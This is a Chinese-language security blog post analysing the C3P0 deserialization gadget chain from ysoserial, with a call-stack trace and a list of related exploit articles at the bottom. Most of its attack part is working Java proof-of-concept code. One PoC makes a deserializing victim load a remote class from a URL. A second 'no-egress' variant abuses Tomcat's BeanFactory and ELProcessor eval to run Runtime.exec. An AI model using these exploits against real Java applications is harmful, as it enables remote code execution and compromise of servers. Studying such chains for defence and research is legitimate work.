『Java安全』反序列化-c3p0触发类加载POP链分析_ysoserial C3P0 PoC分析_不出网利用c3p0实现类加载RCE

已于 2022-03-15 13:48:09 修改
阅读量2k 收藏
点赞数
文章标签: java安全 web安全 ysoserial 反序列化 c3p0
于 2022-03-14 21:15:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123486201
版权

文章目录

前言

所需依赖按照ysoserial下载

        <!-- https://mvnrepository.com/artifact/com.mchange/c3p0 -->
        <dependency>
            <groupId>com.mchange</groupId>
            <artifactId>c3p0</artifactId>
            <version>0.9.5.2</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/com.mchange/mchange-commons-java -->
        <dependency>
            <groupId>com.mchange</groupId>
            <artifactId>mchange-commons-java</artifactId>
            <version>0.2.11</version>
        </dependency>

代码复现

工具类

反射get/set:
ReflectPacked/ValueGetterSetter.java

package ReflectPacked;

import java.lang.reflect.Field;

public class ValueGetterSetter {
    public static void setValue(Class methodInClass, Object targetObj, String name, Object value) throws Exception{
        Field field = methodInClass.getDeclaredField(name);
        field.setAccessible(true);
        field.set(targetObj, value);
    }

    public static void setValue(Object targetObj, String name, Object value) throws Exception{
        setValue(targetObj.getClass(), targetObj, name, value);
    }

    public static Object getValue(Class methodInClass, Object targetObj, String name) throws Exception{
        Field field = methodInClass.getDeclaredField(name);
        field.setAccessible(true);
        return field.get(targetObj);

    }

    public static Object getValue(Object targetObj, String name) throws Exception{
        return getValue(targetObj.getClass(), targetObj, name);
    }

}

反序列化:

UnserializePacked.Unserialize.java

package UnserializePacked;

import java.io.*;

public class Unserialize {
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

PoC

package c3p0;

import ReflectPacked.ValueGetterSetter;
import UnserializePacked.Unserialize;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

public class PoC {
    public static void main(String[] args) throws Exception {
        String url = "http://127.0.0.1/";
        PoolBackedDataSource source = new PoolBackedDataSource();
        ValueGetterSetter.setValue(PoolBackedDataSourceBase.class, source, "connectionPoolDataSource", new PoolSource("Exploit", url));
        Unserialize.unserialize(source);
    }

    private static class PoolSource implements ConnectionPoolDataSource, Referenceable{
        private String className;
        private String url;

        public PoolSource (String className, String url) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference() throws NamingException {
            return new Reference(this.className, this.className, this.url);
        }

        public PooledConnection getPooledConnection() throws SQLException {
            return null;
        }

        public PooledConnection getPooledConnection(String user, String password) throws SQLException {
            return null;
        }

        public PrintWriter getLogWriter() throws SQLException {
            return null;
        }

        public void setLogWriter(PrintWriter out) throws SQLException {

        }

        public void setLoginTimeout(int seconds) throws SQLException {

        }

        public int getLoginTimeout() throws SQLException {
            return 0;
        }

        public Logger getParentLogger() throws SQLFeatureNotSupportedException {
            return null;
        }
    }
}

代码审计 | 原理分析

1. ReferenceSerialized.getObject()触发类加载

ReferenceSerialized是一个私有内部类,在ReferenceIndirector内,构造器传入四个参数,实现了IndirectlySerialized接口
在这里插入图片描述

只要contextName为空就能触发类加载,加载Reference存储的类
在这里插入图片描述
可以加载远程类,也可以加载本地类,因此就有不出网利用的方法
在这里插入图片描述

2. ReferenceIndirector.indirectForm()创建ReferenceSerialized实例

上面分析过ReferenceSerialized是内部私有类,它只通过ReferenceIndirector.indirectForm()创建

ReferenceIndirector的构造器是空的,所有三个属性都要通过setter传入
在这里插入图片描述
indirectForm()能创建ReferenceSerialized实例,传入实现了Referenceable接口的对象然后就会生成Reference创建ReferenceSerialized
在这里插入图片描述
因此传Reference需要手动写一个实现Referenceable的类,把一个静态代码块实现RCE的class放到服务器上,即可触发远程类加载
在这里插入图片描述

3. PoolBackedDataSourceBase反序列化触发IndirectlySerialized.getObject()

readObject触发了IndirectlySerialized.getObject()
在这里插入图片描述
而对象o是从反序列化中读取到的,o是怎么传进去的还得看writeObject()的逻辑

4. PoolBackedDataSourceBase.writeObject()序列化IndirectlySerialized对象

writeObject里面,第一个catch第二个try进行了生成IndirectlySerialized的操作

里面把this.connectionPoolDataSource传入,这是一个实现ConnectionPoolDataSource接口的对象
在这里插入图片描述

还得要确保实现Referenceable接口,并且进入catch部分
在这里插入图片描述
进入catch就是让第一个try报错,第一个try对this.connectionPoolDataSource序列化了,只要不继承Serializable就会报错
在这里插入图片描述
总结就是要手动编写一个实现上述两个接口、不能继承Serializable、getReference返回恶意Reference的类,如下所示:
在这里插入图片描述

POP链

<clinit>:6, Exploit
forName0:-1, Class (java.lang)
forName:348, Class (java.lang)
referenceToObject:91, ReferenceableUtils (com.mchange.v2.naming)
getObject:118, ReferenceIndirector$ReferenceSerialized (com.mchange.v2.naming)
readObject:211, PoolBackedDataSourceBase (com.mchange.v2.c3p0.impl)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1909, ObjectInputStream (java.io)
readOrdinaryObject:1808, ObjectInputStream (java.io)
readObject0:1353, ObjectInputStream (java.io)
readObject:373, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:23, PoC (c3p0)

※不出网利用c3p0

注意到调用的是ReferenceableUtils.referenceToObject()来进行类加载,支持本地工厂类和远程URL的类加载
在这里插入图片描述
因此可以不出网利用BeanFactory来进行本地类加载,同绕过JDK高版本JNDI注入

『Java安全』绕过JDK高版本限制进行JNDI注入学习研究

package c3p0;

import ReflectPacked.ValueGetterSetter;
import UnserializePacked.Unserialize;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

public class LocalPoC {
    public static void main(String[] args) throws Exception {

        PoolBackedDataSource source = new PoolBackedDataSource();
        ValueGetterSetter.setValue(PoolBackedDataSourceBase.class, source, "connectionPoolDataSource", new PoolSource());
        Unserialize.unserialize(source);
    }

    private static class PoolSource implements ConnectionPoolDataSource, Referenceable{
        public PoolSource () {
        }

        public Reference getReference() throws NamingException {
            ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            resourceRef.add(new StringRefAddr("forceString", "a=eval"));
            resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
            return resourceRef;
        }

        public PooledConnection getPooledConnection() throws SQLException {
            return null;
        }

        public PooledConnection getPooledConnection(String user, String password) throws SQLException {
            return null;
        }

        public PrintWriter getLogWriter() throws SQLException {
            return null;
        }

        public void setLogWriter(PrintWriter out) throws SQLException {

        }

        public void setLoginTimeout(int seconds) throws SQLException {

        }

        public int getLoginTimeout() throws SQLException {
            return 0;
        }

        public Logger getParentLogger() throws SQLFeatureNotSupportedException {
            return null;
        }
    }
}

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123486201
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
代码审计-ysoserial-C3P0分析
cdyunaq的博客
11-22 257
介绍 C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate、Spring等。 基础使用 先看看ysoserial中需要的依赖是啥,方便后期调试也可以用 Pom.xml <!-- https://mvnrepository.com/artifact/com.mchange/c3p0 --> <dependency> <groupId>com.mchange&.
C3P0反序列化链学习
虚幻私塾
04-21 1685
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
fastjson-c3p0:fastjson不出回显利用
03-19
fastjson-c3p0 fastjson不出回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
[Java安全]C3P0反序列化不出利用学习
Y4tacker的博客
10-13 1317
文章目录参考文章利用链构造利用链分析 参考文章 本文复现了雨了个雨师傅的文章,思路很好,看完以后其实和JNDI8u191后的绕过思路一致,这个等下再复现学习 利用链构造 在昨天看了Ysoserial的基本过程以后其实这个就相对简单了,不一样的地方就是后面Ysoserial用了URLClassLoader,而这个是当前线程下的ClassLoader,曾经一直觉得没用,还是自己学的太少了,大佬想到通过Tomcat的getObjectInstance方法调用ELProcessor的eval方法实现表达式注入 p
【第67课】Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出
最新发布
Lucker_YYY的博客
08-20 965
JNDI全称为 Java Naming and DirectoryInterface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、络、机器、对象和服务等各种资源。JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。
java反序列化时的类加载
xiemk2005的专栏
08-30 3185
<br />http://www.pcdog.com/edu/java/20/11/w240538.html<br /> <br />    序列化对象在Java中 主要有两个目的,一个是钝化存储对象,另一个是通过络传输对象。 后者是移动或者远程计算的基础。前者比较好办,对象存储之后,往往由同一个程序再读出, 对象在解析的时候不存在类加载的问题。后者比较麻烦,接收序列化对象的一端往往同发送端的类加载器环境不一样,很有可能找不到发送端才有的类代码,因此也 就无法反序列化对象,造成ClassNotFo
Web】浅聊Java反序列化C3P0——不出Hex字节码加载利用
uuzeray的博客
03-08 984
不出的情况下,这个C3P0的Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等配合使用(调用setter和初始化方法)
Celery 4.0 Redis未授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis未授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题...
JAVA反序列化漏洞-ysoserial-URLDNS链分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 912
对于进行反序列化漏洞原理的学习,URLDNS这条链比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出等情况,为了后期进一步有效性的利用。让我们开始学习吧!
FastJson不出rce
yggcwhat
01-02 1229
FastJson不出rce
WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出
siu~
12-18 1310
知识点: 1、Java安全-RCE执行-5大类函数调用 2、Java安全-JNDI注入-RMI&LDAP&高版本 3、Java安全-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j
浅谈Log4j2无法rce利用:信息泄露与不出回显
weixin_50464560的博客
05-01 3764
https://xz.aliyun.com/t/10659 0x00 介绍 本文核心是探讨:由于各种情况(RASP和SecurityManager等)导致无法RCE时候如何利用Log4j2 最近在赛博回忆录看到很多大佬提出Log4j2的利用姿势,本文也是参考各位大佬(比如浅蓝大佬)的成果做个总结 昨天看到P师傅凌晨三点还在研究Log4j2在ES中的利用,P牛指出: ElasticSearch利用Java的SecurityManager安全机制来防御文件操作和Socket操作,所以无法正常连接远程服
RCE篇之无回显rce
mingyqf的博客
01-13 1474
原文链接:http://arsenetang.com/2021/07/23/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%9B%9E%E6%98%BErce/
[Java反序列化]—C3P0反序列化
Sentiment的博客
11-11 1430
文章首发于先知社区:https://xz.aliyun.com/t/11830
Javaweb安全——反序列化漏洞-C3P0
weixin_43610673的博客
10-25 2182
C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。即将用于连接数据库的连接整合在一起形成一个随取随用的数据库连接池(Connection pool)。..............自下向上的调用,从lookup看着像一个jndi注入,调用链比较短,直接静态审计源码试试。还原属性赋值跟到的内部类的方法。
安全-JDBC反序列化漏洞与RCE
关注网络安全、云原生安全
04-16 3033
可以看到执行语句后,在生成结果集时使用了ResultUtil的resultSetToMap函数,继续点击去,可以看到使用了getObject和readObject,而readObject就在反序列化时自动调用。Y4tacker师傅的脚本会读取a文件,没有的话就使用默认的,也能达到RCE的效果,这个在url中就不必指定user了。这里只需要连接就行,没有安装的话可以使用Java的mysql jdbc包连接也可以。虽然演讲者给出了调用链,但是没有提供恶意服务器,这就需要我们抓包,编写一个假的服务器。
火爆全的Log4j 漏洞复现GetShell
柠檬i的博客
12-26 8189
Apache Log4j2 JNDI注入漏洞(CVE-2021-44228),可以任意命令执行
Java反序列化C3P0链学习
顶峰
02-06 213
对于从来没有接触过安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
YSOSERIAL Payloads分析笔记(2)
fnmsd的博客
04-01 6192
前沿 继续接着前面的进行分析。 说一句感想:YSO的Payloads有个特点:在目标的readObject的过程中尽量不触发异常。emm,当然后面由于类型的不匹配什么的造成的异常就跟反序列化过程没关系了。 BeanShell1 BeanShell是什么? BeanShell是一个小型嵌入式Java源代码解释器,具有对象脚本语言特性,能够动态地执行标准JAVA语法,并利用JavaScript和P...
Java安全:深入解析反序列化漏洞
"本文是关于Java安全的系列文章,主要探讨反序列化相关的安全问题。" 在Java编程中,反序列化是一个将字节流转换回对象的过程,这在处理络通信、持久化存储等场景中非常常见。然而,不恰当的反序列化处理可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值